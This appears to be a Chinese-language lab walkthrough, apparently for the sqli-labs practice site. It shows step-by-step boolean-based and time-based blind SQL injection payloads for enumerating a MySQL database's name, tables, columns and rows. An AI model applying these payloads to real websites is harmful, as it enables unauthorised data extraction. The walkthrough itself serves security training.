一:boolen盲注
1.确认注入的类型
?id=1'
?id=1" ?id=1
只有在单引号时无显。
?id=1' AND 1=1 --+
由于 1=1 条件恒为真,若页面显示 You are in...........,说明构造的条件使 SQL 查询能匹配到结果。
?id=1' AND 1=2 --+
由于 1=2 条件恒为假,若页面不显示 You are in...........,说明构造的条件使 SQL 查询无匹配结果。
2.数据库名长度
?id=1'and length((select database()))=7--+
?id=1'and length((select database()))=8--+
3.获取数据库名
?id=1' and ascii(substr((database()),1,1)) =115 --+
4.获取表名
?id=1' and (ascii(substr(( select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)))=101--+
5.获取具体数据
?id=1%27%20and%20%20(select%20count(*)%20from%20users)=13%20--+
二:时间盲注
1.判断注入类型
?id=1%27%20AND%20SLEEP(5)--+
首先,我们需要确认注入点是否存在。可以尝试在 id 参数后面添加单引号,观察页面响应时间是否有变化。如果页面响应时间明显增加了 5 秒,说明注入点存在。
2,获取数据库名长度
?id=1%27%20AND%20IF(LENGTH(DATABASE())=N,%20SLEEP(5),%201)--+
将 N 从 1 开始逐步递增,直到页面响应时间增加了 5 秒,此时的 N 就是数据库名的长度。
3.获取数据库名id=1%27%20AND%20IF(SUBSTR(DATABASE(),%20N,%201)=%27CHAR%27,%20SLEEP(5),%201)--+
将 N 从 1 开始逐步递增,CHAR 从 a 到 z、A 到 Z、0 到 9 以及其他可能的字符进行尝试,直到页面响应时间增加了 5 秒,此时的 CHAR 就是数据库名的第 N 位字符。
4.获取表名
?id=1' AND IF(SUBSTR((SELECT table_name FROM information_schema.tables WHERE table_schema='DATABASE_NAME' LIMIT N, 1), 1, 1)='CHAR', SLEEP(5), 1)--+
直到页面响应时间增加了 5 秒,此时的 CHAR 就是第 N 个表名的第 1 位字符。然后逐步递增 N 和字符位置,直到获取到所有表名。
5.获取列名
?id=1' AND IF(SUBSTR((SELECT column_name FROM information_schema.columns WHERE table_schema='DATABASE_NAME' AND table_name='TABLE_NAME' LIMIT N, 1), 1, 1)='CHAR', SLEEP(5), 1)--+
直到页面响应时间增加了 5 秒,此时的 CHAR 就是第 N 个列名的第 1 位字符。然后逐步递增 N 和字符位置,直到获取到所有列名。
6.获取数据
id=1' AND IF(SUBSTR((SELECT COLUMN_NAME FROM TABLE_NAME LIMIT N, 1), 1, 1)='CHAR', SLEEP(5), 1)--+
直到页面响应时间增加了 5 秒,此时的 CHAR 就是第 N 条记录的 COLUMN_NAME 列的第 1 位字符。然后逐步递增 N 和字符位置,直到获取到所有数据。